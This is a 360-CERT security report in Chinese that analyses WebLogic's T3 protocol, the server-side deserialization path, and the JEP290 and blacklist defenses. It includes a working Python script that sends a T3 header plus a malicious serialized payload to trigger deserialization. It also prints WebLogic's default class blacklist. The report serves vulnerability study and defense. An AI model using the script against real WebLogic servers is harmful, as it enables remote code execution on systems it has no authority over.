weblogic t3 协议利用与防御

原创 360-CERT [360CERT](javascript:void(0)???? 4天前

weblogic t3 协议利用与防御_安全技术

报告编号:B6-2020-032001

报告来源:360-CERT

报告作者:Hu3sky

更新日期:2020-03-20

0x00 前置知识

weblogic t3协议指的是weblogicrmi使用的t3协议,在java rmi中,默认rmi使用的是jrmp协议,weblogic包含了高度优化的RMI实现

在一般的基于jrmprmi,通信由4个部分组成

客户端对象服务端对象客户端代理对象(stub)服务端代理对象(skeleton)

webLogic支持动态生成客户端Stub和服务器端skeleton,从而无需为RMI对象生成客户端Stub和服务器端skeleton,将对象部署到RMI 注册中心JNDI时,webLogic将自动生成必要的代理

RMI注册中心会随着weblogic服务的启动自动运行。

0x01 实现正常t3类的调用

接下来我们看一个例子来了解weblogic rmi 首先创建一个interface

package com.hu3sky.t3;public interface Hello extends java.rmi.Remote{    public void sayHello() throws java.rmi.RemoteException;;}

实现类

package com.hu3sky.t3;import java.rmi.RemoteException;public class HelloImpl implements Hello {    @Override    public void sayHello() throws RemoteException {        System.out.println("hello");    }}

WebLogic不需要rmi对象的实现类扩展 UnicastRemoteObject。在一般的rmi对象中是必须要继承UnicastRemoteObject

Server端

package com.hu3sky.t3;import javax.naming.*;import java.util.Hashtable;public class Server {    // The factory to use when creating our initial context    public final static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";    /**     * Create an instance of the Implementation class     * and bind it in the registry.     */    public static void main(String[] args) {        try {            Context ctx = getInitialContext("t3://127.0.0.1:7001");            ctx.bind("HelloServer", new HelloImpl());            System.out.println("HelloImpl created and bound to the JNDI");        }        catch (Exception e) {            System.out.println("HelloImpl.main: an exception occurred!");            e.printStackTrace(System.out);        }    }    /* Creates the Initial JNDI Context */    private static InitialContext getInitialContext(String url) throws NamingException {        Hashtable env = new Hashtable();        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);        env.put(Context.PROVIDER_URL, url);        return new InitialContext(env);    }}

Client端

package com.hu3sky.t3;import java.util.Hashtable;import javax.naming.Context;import javax.naming.InitialContext;import javax.naming.NamingException;public class Client {    // Defines the JNDI context factory.    public final static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";    public Client() {    }    public static void main(String[] args) throws Exception {        try {            InitialContext ic = getInitialContext("t3://127.0.0.1:7001");            Hello obj = (Hello) ic.lookup("HelloServer");            System.out.println("Successfully connected to HelloServer , call sayHello() : "+obj.sayHello());        } catch (Exception ex) {            System.err.println("An exception occurred: " + ex.getMessage());            throw ex;        }    }    private static InitialContext getInitialContext(String url)            throws NamingException {        Hashtable<String, String> env = new Hashtable<String, String>();        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);        env.put(Context.PROVIDER_URL, url);        return new InitialContext(env);    }}

然而,此时还无法直接运行,需要使用WebLogic启动类注册RMI对象

步骤如下:

  1. 修改项目pom,打包为jar
<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">    <modelVersion>4.0.0</modelVersion>    <groupId>com.hu3sky</groupId>    <artifactId>t3</artifactId>    <version>1.0-SNAPSHOT</version>    <build>        <plugins>            <plugin>                <groupId>org.apache.maven.plugins</groupId>                <artifactId>maven-compiler-plugin</artifactId>                <configuration>                    <source>1.8</source>                    <target>1.8</target>                </configuration>            </plugin>            <plugin>                <groupId>org.apache.maven.plugins</groupId>                <artifactId>maven-jar-plugin</artifactId>                <configuration>                    <archive>                        <manifest>                            <addClasspath>true</addClasspath>                            <useUniqueVersions>false</useUniqueVersions>                            <classpathPrefix>lib/</classpathPrefix>                            <mainClass>com.hu3sky.t3.Server</mainClass>                        </manifest>                    </archive>                </configuration>            </plugin>        </plugins>    </build></project>
  1. 将jar包复制到域的/lib文件下,重启weblogic即可

成功后查看jndi树,会发现HelloServer成功被加载 weblogic t3 协议利用与防御_安全技术_02接着我们再运行一下Client weblogic t3 协议利用与防御_网络安全_03成功调用Server上的sayHello方法

1.1 分析流量

这是7001端口上的数据包,红色是客户端向服务器请求数据,蓝色的是服务器返回数据 可以看到发送的第一个数据包为T3协议头,其中第一行为t3weblogic客户端的版本号,weblogic服务器的返回数据的第一行为HELO:weblogic服务器的版本号。weblogic客户端与服务器发送的数据均以\n\n结尾。 weblogic t3 协议利用与防御_安全技术_04 最后返回Hello World weblogic t3 协议利用与防御_渗透测试_05 我们再看下hex,不难发现其中的 ac ed 00 05 序列化魔术头,而且不止一处 weblogic t3 协议利用与防御_渗透测试_06 通过观察请求数据包,我们可以发现请求的数据包可以分为多个部分,我这里分离出了九个部分 第一部分的前四个字节为整个数据包的长度,第二至九部分均为JAVA序列化数据

其中第二到九部分序列化的类是

weblogic.rjvm.ClassTableEntryweblogic.rjvm.ClassTableEntryweblogic.rjvm.ClassTableEntryweblogic.rjvm.JVMIDweblogic.rjvm.JVMID  weblogic.rjvm.ClassTableEntryweblogic.rjvm.ImmutableServiceContextweblogic.rjvm.ImmutableServiceContext

从这里的红框部分开始,为第一个部分,后面的都是以 ac ed 00 05 开头的魔术头的反序列化部分 weblogic t3 协议利用与防御_安全技术_07 中间其他部分就省略了 weblogic t3 协议利用与防御_网络安全_08

1.2 利用t3协议进行恶意序列化

在编写利用的过程中,需要发送两部分的数据

  • 请求包头,也就是

    t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n
    

    \n结束

  • 序列化数据部分,序列化部分的构成方式有两种:

    • 第一种生成方式为,将前文所述的weblogic发送的JAVA序列化数据的第二到九部分的JAVA序列化数据的任意一个替换为恶意的序列化数据。
    • 第二种生成方式为,将前文所述的weblogic发送的JAVA序列化数据的第一部分与恶意的序列化数据进行拼接

必须先发送T3协议头数据包,再发送JAVA序列化数据包,才能使weblogic进行JAVA反序列化,进而触发漏洞。如果只发送JAVA序列化数据包,不先发送T3协议头数据包,无法触发漏洞

1.3 脚本编写

这里我采取第二种方法进行脚本的编写,思路是:

  1. 建立socket请求
  2. 发送t3请求数据头
  3. 读取恶意序列化数据,将其拼接至第一部分序列化数据之后
  4. 将前四个字节的长度进行替换
  5. 发送恶意数据

脚本如下

#!/usr/bin/pythonimport socketimport osimport sysimport structif len(sys.argv) < 3:    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])    sys.exit()sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(5)server_address = (sys.argv[1], int(sys.argv[2]))print '[+] Connecting to %s port %s' % server_addresssock.connect(server_address)# Send headersheaders='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n'print 'sending "%s"' % headerssock.sendall(headers)data = sock.recv(1024)print >>sys.stderr, 'received "%s"' % datapayloadObj = open(sys.argv[3],'rb').read()payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00'payload=payload+payloadObj# adjust header for appropriate message lengthpayload=struct.pack('>I',len(payload)) + payload[4:]print '[+] Sending payload...'sock.send(payload)data = sock.recv(1024)print >>sys.stderr, 'received "%s"' % data

weblogic t3 协议利用与防御_安全技术_09

0x02 服务端反序列化部分源码分析

这里只做部分分析,分析的比较浅,如果有地方分析有误还请师傅指出 通过观察log里的错误,可以发现调用栈

java.io.EOFException    at weblogic.utils.io.DataIO.readUnsignedByte(DataIO.java:435)    at weblogic.utils.io.DataIO.readLength(DataIO.java:829)    at weblogic.utils.io.ChunkedDataInputStream.readLength(ChunkedDataInputStream.java:150)    at weblogic.utils.io.ChunkedObjectInputStream.readLength(ChunkedObjectInputStream.java:206)    at weblogic.rjvm.InboundMsgAbbrev.read(InboundMsgAbbrev.java:43)    at weblogic.rjvm.MsgAbbrevJVMConnection.readMsgAbbrevs(MsgAbbrevJVMConnection.java:325)    at weblogic.rjvm.MsgAbbrevInputStream.init(MsgAbbrevInputStream.java:219)    at weblogic.rjvm.MsgAbbrevJVMConnection.dispatch(MsgAbbrevJVMConnection.java:557)    at weblogic.rjvm.t3.MuxableSocketT3.dispatch(MuxableSocketT3.java:666)    at weblogic.socket.BaseAbstractMuxableSocket.dispatch(BaseAbstractMuxableSocket.java:397)    at weblogic.socket.SocketMuxer.readReadySocketOnce(SocketMuxer.java:993)    at weblogic.socket.SocketMuxer.readReadySocket(SocketMuxer.java:929)    at weblogic.socket.NIOSocketMuxer.process(NIOSocketMuxer.java:599)    at weblogic.socket.NIOSocketMuxer.processSockets(NIOSocketMuxer.java:563)    at weblogic.socket.SocketReaderRequest.run(SocketReaderRequest.java:30)    at weblogic.socket.SocketReaderRequest.execute(SocketReaderRequest.java:43)    at weblogic.kernel.ExecuteThread.execute(ExecuteThread.java:147)    at weblogic.kernel.ExecuteThread.run(ExecuteThread.java:119)

或者在idea里进行调试,也能看到调用栈 weblogic t3 协议利用与防御_渗透测试_10

关于muxer,`WebLogic Server`使用称为复用器(`muxer`)的软件模块来读取服务器上的传入请求和客户端上的传入响应,`SocketMuxer`管理服务器的现有套接字连接。它首先确定哪些套接字具有等待处理的传入请求。然后,它读取足够的数据来确定协议,并根据协议将套接字分配到适当的运行时层。在运行时层,套接字混合器线程确定要使用的执行线程队列,并相应地委派请求

2.1 SocketMuxer初始化

先看到SocketMuxer初始化。在 weblogic t3 协议利用与防御_安全技术_11

调用initSocketMuxerOnServer,需要返回singleton的值 weblogic t3 协议利用与防御_网络安全_12 该值为makeTheMuxer函数的return值 weblogic t3 协议利用与防御_渗透测试_13 由于KernelStatus.isServer()返回true,所以直接调用getNativeMuxerClassName(),获取本地muxer weblogic t3 协议利用与防御_网络安全_14 这里根据内核配置获取到的为NIOSocketMuxer weblogic t3 协议利用与防御_网络安全_15 获取完之后,调用muxerClassName的构造函数 weblogic t3 协议利用与防御_网络安全_16 会创建Selector weblogic t3 协议利用与防御_安全技术_17 其中sockets成员变量来自抽象类SocketMuxer weblogic t3 协议利用与防御_渗透测试_18 接着开启 socketReader 线程 weblogic t3 协议利用与防御_安全技术_19 看到SocketReaderRequest.rungetMuxer返回NIOSocketMuxer weblogic t3 协议利用与防御_安全技术_20 跟进NIOSocketMuxer.processSockets 首先会调用selectFrom,这里会获取注册过的一些变量,比如sockets

(注册大致如下,就不细说了 weblogic t3 协议利用与防御_安全技术_21)

2.2 分派创建T3 Muxer

接着看process方法,这里的SelectionKey键表示了一个特定的通道对象和一个特定的选择器对象之间的注册关系。 weblogic t3 协议利用与防御_网络安全_22ms是从NIOSocketMuxer中获取sockets,这里为MuxableSocketDiscriminator,用来鉴别套接字,之后再分发给相应的Muxer weblogic t3 协议利用与防御_渗透测试_23 跟进readReadySocket weblogic t3 协议利用与防御_渗透测试_24 然后调用dispatch weblogic t3 协议利用与防御_安全技术_25 这里会根据我们发送的套接字数据,判断协议,返回t3 weblogic t3 协议利用与防御_安全技术_26 接着调用ProtocolHandlerT3.createSocket,创建相关的 Muxer weblogic t3 协议利用与防御_网络安全_27weblogic t3 协议利用与防御_安全技术_28

调用父类构造方法对channel等变量进行初始化,接着将connection变量赋值为T3MsgAbbrevJVMConnection weblogic t3 协议利用与防御_网络安全_29

        this.connection.setDispatcher(ConnectionManager.create((RJVMImpl)null), false);

看到ConnectionManager.create weblogic t3 协议利用与防御_渗透测试_30RJVMEnvironment环境为true,返回classnameweblogic.rjvm.ConnectionManagerServer,也就是dispatcher,然后调用setDispatcher设置dispatcher

创建完muxer之后,移除之前的sockets,也就是MuxableSocketDiscriminator,重新注册socketsMuxableSocketT3

weblogic t3 协议利用与防御_渗透测试_31

2.3 T3 Muxer 反序列化socket数据

再次循环调用process weblogic t3 协议利用与防御_安全技术_32 传入ms,也就是MuxableSocketT3,跟入readReadySocket weblogic t3 协议利用与防御_安全技术_33 接着调用readReadySocketOnce weblogic t3 协议利用与防御_渗透测试_34 往下走,调用dispatch进行分发 weblogic t3 协议利用与防御_渗透测试_35 由于MuxableSocketT3没有无参的dispatch函数,于是调用父类BaseAbstractMuxableSocketdispatch makeChunkList返回socket数据流,作为参数传入dispatch weblogic t3 协议利用与防御_安全技术_36 接着调用T3MsgAbbrevJVMConnection.dispatch weblogic t3 协议利用与防御_渗透测试_37 从之前设置的dispatcher获取incomingMessage weblogic t3 协议利用与防御_安全技术_38 调用connection.readMsgAbbrevs weblogic t3 协议利用与防御_网络安全_39 跟进read函数 weblogic t3 协议利用与防御_网络安全_40 调用readObject函数 weblogic t3 协议利用与防御_网络安全_41InboundMsgAbbrev.ServerChannelInputStream处理数据之后,调用ObjectInpuStream.readObject造成反序列化 weblogic t3 协议利用与防御_渗透测试_42

0x03 防御机制

3.1 JEP290机制

JEP290机制是用来过滤传入的序列化数据,以提高安全性,其核心机制是序列化客户端需要实现ObjectInputStream上的ObjectInputFilter接口(低于jdk9的版本是在sun.misc这个package下,而jdk9是在 java.io 这个package下),利用checkInput方法来对序列化数据进行检测,如果有任何不合格的检测,Filter将返回Status.REJECTED

jdk9向下增加jep290机制的jdk版本为

Java™ SE Development Kit 8, Update 121 (JDK 8u121)Java™ SE Development Kit 7, Update 131 (JDK 7u131)Java™ SE Development Kit 6, Update 141 (JDK 6u141)

这里使用测试版本jdk8u221 图上的流程已经很明显了,我们来看看如果被jdk拦截是什么样子的,这里我随便用了CommonsCollectionsgadget做测试,使用的测试版本jdk8u221

3.1.1 filterCheck

最终的拦截调用是 readOrdinaryObject->readClassDesc->readNonProxyDesc->filterCheck

weblogic t3 协议利用与防御_网络安全_43 这里的ObjectInputFilter类型变量serialFilterserialFilter的值是作为 JEP290对序列化数据进行检测的一个格式(里面包含需要做检测的默认值,用分号隔开。包名后面需要带星号,包名或者类名前面带感叹号的话表示黑名单,没有则表示白名单)

具体细则 weblogic t3 协议利用与防御_安全技术_44

这里的serialFilter值如下

maxdepth=100;!org.codehaus.groovy.runtime.ConvertedClosure;!org.codehaus.groovy.runtime.ConversionHandler;!org.codehaus.groovy.runtime.MethodClosure;!org.springframework.transaction.support.AbstractPlatformTransactionManager;!java.rmi.server.UnicastRemoteObject;!java.rmi.server.RemoteObjectInvocationHandler;!com.bea.core.repackaged.springframework.transaction.support.AbstractPlatformTransactionManager;!java.rmi.server.RemoteObject;!org.apache.commons.collections.functors.*;!com.sun.org.apache.xalan.internal.xsltc.trax.*;!javassist.*;!java.rmi.activation.*;!sun.rmi.server.*;!org.jboss.interceptor.builder.*;!org.jboss.interceptor.reader.*;!org.jboss.interceptor.proxy.*;!org.jboss.interceptor.spi.metadata.*;!org.jboss.interceptor.spi.model.*;!com.bea.core.repackaged.springframework.aop.aspectj.*;!com.bea.core.repackaged.springframework.aop.aspectj.annotation.*;!com.bea.core.repackaged.springframework.aop.aspectj.autoproxy.*;!com.bea.core.repackaged.springframework.beans.factory.support.*;!org.python.core.*

3.1.2 serialFilter赋值过程

来看看weblogic是如何初始化这个值的,weblogic在启动t3Server的时候,会进行filter的初始化,在初始化的时候,首先会实例化JreFilterApiProxy这个类 weblogic t3 协议利用与防御_网络安全_45 这里主要通过反射获取ObjectInputFilter的方法,当做一个api来使用,同时会调用determineJreFilterSupportLevel方来判断ObjectInputFilterpackage weblogic t3 协议利用与防御_网络安全_46 接着会调用到weblogic.utils.io.oif.WebLogicFilterConfig的构造方法

weblogic t3 协议利用与防御_渗透测试_47

weblogic t3 协议利用与防御_安全技术_48 为初始化前,FilterPropertiesBlacklistProperties都为null,都返回false, 于是跟进processDefaultConfiguration方法

weblogic t3 协议利用与防御_安全技术_49

接着调用getDefaultFilterScope判断当前jdk,我们测试版本是8u221,返回GLOBAL weblogic t3 协议利用与防御_安全技术_50 接着是constructSerialFilter,开始对serialFilter进行赋值,主要是对serialFilter的格式进行统一 黑名单主要来自DEFAULT_BLACKLIST_CLASSESDEFAULT_BLACKLIST_PACKAGESweblogic t3 协议利用与防御_安全技术_51serialFilter的赋值结束后,会通过反射调用ObjectInputFilter.setSerialFilter,对ObjectInputFilter接口的serialFilter赋值 weblogic t3 协议利用与防御_网络安全_52 再之后,就是上文的ObjectInputFilter.checkInput的调用了 具体的检测过程如下 weblogic t3 协议利用与防御_网络安全_53 这就是在jep290的机制下的weblogic配合jdk ObjectInputFilter 的一个检测过程,就是一个基于类/包的黑名单检测,还是存在绕过的可能性,比如最近的 CVE-2020-2555gadgets,可以参考 CVE-2020-2555 漏洞分析

3.2 jdk版本过低没有JEP290机制

接下来,修改启动版本为jdk8u91 先来看日志报错

3.2.1 黑名单赋值

跟进代码看看weblogic启动t3的时候,依然是跟进到JreFilterApiProxy weblogic t3 协议利用与防御_安全技术_54determineJreFilterSupportLevel方法,由于加载不到ObjectInputFilter,所以直接将FilterSupportLevel设置为NULL,也就不会进入到下面的if判断里了,initialized属性也不会被设置为true weblogic t3 协议利用与防御_渗透测试_55initializedfalse,返回isJreFilteringAvailable也为false weblogic t3 协议利用与防御_网络安全_56

接着往下走,依然会实例化WebLogicFilterConfig,初始化黑名单,这里和jep290有些区别 weblogic t3 协议利用与防御_安全技术_57 调用constructLegacyBlacklist,就是一个将DEFAULT_BLACKLIST_CLASSESDEFAULT_BLACKLIST_PACKAGES赋值给存放黑名单属性的函数,最后赋值给LEGACY_BLACKLIST属性 weblogic t3 协议利用与防御_渗透测试_58

3.2.2 resolveClass

在普通的java反序列化的过程中会调用resolveClass读取反序列化的类名,所以我们可以通过重写ObjectInputStream对象的resolveClass方法即可实现对反序列化的校验,来看weblogic是如何实现的

根据错误日志,定位到weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream

我们看到反序列化的点 weblogic t3 协议利用与防御_安全技术_59 这里将类型转换为ServerChannelInputStream,该类继承了ObjectInputStream weblogic t3 协议利用与防御_安全技术_60

并且重写了resolveClass weblogic t3 协议利用与防御_网络安全_61 在反序列化的时候,就会优先调用重写的resolveClass weblogic t3 协议利用与防御_网络安全_62

接着跟进checkLegacyBlacklistIfNeeded weblogic t3 协议利用与防御_安全技术_63 这里首先会判断isJreFilteringAvailable属性(jep290机制下该值为true,所以不会用这种方法进行检测),然后会调用isBlacklistedLegacy判断反序列化类是否在黑名单里 weblogic t3 协议利用与防御_渗透测试_64

最后通过一张“JSON反序列化之殇_看雪安全开发者峰会”的时序图进行总结 weblogic t3 协议利用与防御_安全技术_65

0x04 时间线

2020-03-20 360-CERT 发布报告

0x05 参考链接

1.https://docs.oracle.com/middleware/1213/wls/WLRMI/rmi_imp.htm#WLRMI146

2.https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/jndi/ViewObjectsInTheJNDITree.html

3.https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#weblogic

4.http://drops.xmd5.com/static/drops/web-13470.html

5.https://stackoverflow.com/questions/1623692/what-is-weblogic-socket-muxer

6.http://openjdk.java.net/jeps/290

7.https://paper.seebug.org/454/

8.https://mp.weixin.qq.com/s?**biz=Mzg2OTA0Njk0OA==&mid=2247484951&idx=1&sn=0cef67df4b883b198da467c927533316&source=41#wechat_redirecthttps://mp.weixin.qq.com/s?**biz=Mzg2OTA0Njk0OA==&mid=2247484951&idx=1&sn=0cef67df4b883b198da467c927533316&source=41#wechat_redirect

9.Java_JSON反序列化之殇_看雪安全开发者峰会.pdf

转载自https://mp.weixin.qq.com/s/umATmI0ytI7JeOv9p0g6pg